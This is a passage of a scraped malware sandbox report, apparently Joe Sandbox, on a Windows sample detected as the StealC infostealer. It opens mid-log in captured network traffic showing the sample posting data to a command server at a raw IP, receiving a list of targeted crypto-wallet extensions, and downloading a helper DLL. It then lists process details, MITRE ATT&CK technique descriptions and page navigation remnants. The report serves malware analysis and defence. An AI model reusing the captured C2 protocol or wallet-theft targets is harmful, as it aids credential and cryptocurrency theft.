6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="message"fplugins------BKJKJEHJJDAKECBFCGID--
Sep 1, 2024 20:54:03.914266109 CEST	335	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 18:54:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 1, 2024 20:54:03.993865967 CEST	203	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ Host: 185.215.113.100 Content-Length: 5531 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 20:54:03.993901968 CEST	5531	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 1, 2024 20:54:06.322704077 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 18:54:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 20:54:06.598507881 CEST	94	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Sep 1, 2024 20:54:06.895553112 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 18:54:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70

Target ID:	0
Start time:	14:53:54
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x320000
File size:	1'751'552 bytes
MD5 hash:	E327E97714AA25537FDE40F3C48EFDE7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:54:59
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600
Imagebase:	0xf30000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\IJECAEHJJJKJKFIDGCBGIJJJEH

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_d6eca444034557dbadee3a9b8c12d3885e1caed_6983241a_16bd15ca-eeb6-4121-8ba8-a24a92496132\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CDF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E47.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E87.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Windows Analysis Report
file.exe